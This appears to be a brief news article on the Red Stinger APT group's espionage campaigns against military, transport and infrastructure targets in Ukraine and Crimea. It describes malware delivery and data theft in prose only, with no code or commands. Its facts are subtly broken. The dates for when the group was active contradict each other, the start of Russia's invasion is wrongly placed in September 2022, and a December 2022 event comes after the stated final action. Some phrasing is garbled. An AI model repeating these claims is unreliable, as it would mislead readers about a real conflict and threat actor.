Since December 2020, a cyber attacker collective known as Red Stinger has been responsible for several sophisticated, ongoing threat (APT) assaults on Eastern European military, shipping, and vital infrastructure targets. Malwarebytes, a cybersecurity company, has revealed that Red Stinger targeted entities involved in the September East Ukraine referendums and managed to steal sensitive data such as snapshots, USB drives, keyboard strokes, and microphone recordings, depending on the campaign.
The APT group, which overlaps with another threat cluster known as Bad Magic, has targeted government, agriculture, and transportation organizations in Donetsk, Lugansk, and Crimea since 2020. The first operation occurred in December 2020, with evidence suggesting that the group may have been active since at least September 2021. The final recorded action of the organization took place in September 2022, which was also the beginning of Russia’s armed invasion of Ukraine.
On hacked machines, the assault chain drops the DBoxShell (PowerMagic) implant using fraudulent installation files. Within a ZIP package, a Windows shortcut is used to download the MSI file. The group has also used alternative implants like GraphShell, which utilizes the Microsoft Graph API for command-and-control (C&C) purposes.
The gang used tools including ngrok, rsockstun, and a binary file to steal victim information to a Dropbox account under an actor’s control. Although the exact scale of the infections is unknown, evidence suggests that two casualties, a military victim and an official working in important facilities, had been hacked in February 2022 in central Ukraine. After a period of observation, the potential agents in both cases stole screenshots, microphone recordings, and office files.
The motivations behind the attacks remain unknown, although the attackers infected their Windows 10 machines in December 2022, likely for testing purposes. The group’s choice of the Fahrenheit thermometer scale and English as their primary language shows that native English speakers were involved.
The experts contend that it is difficult to pin the attack on a particular nation since some victims supported Russia while others supported Ukraine. The main goals of the assault were monitoring and data collecting and the perpetrators protected their victims with various defenses and powerful instruments. The attack was targeted at specific entities.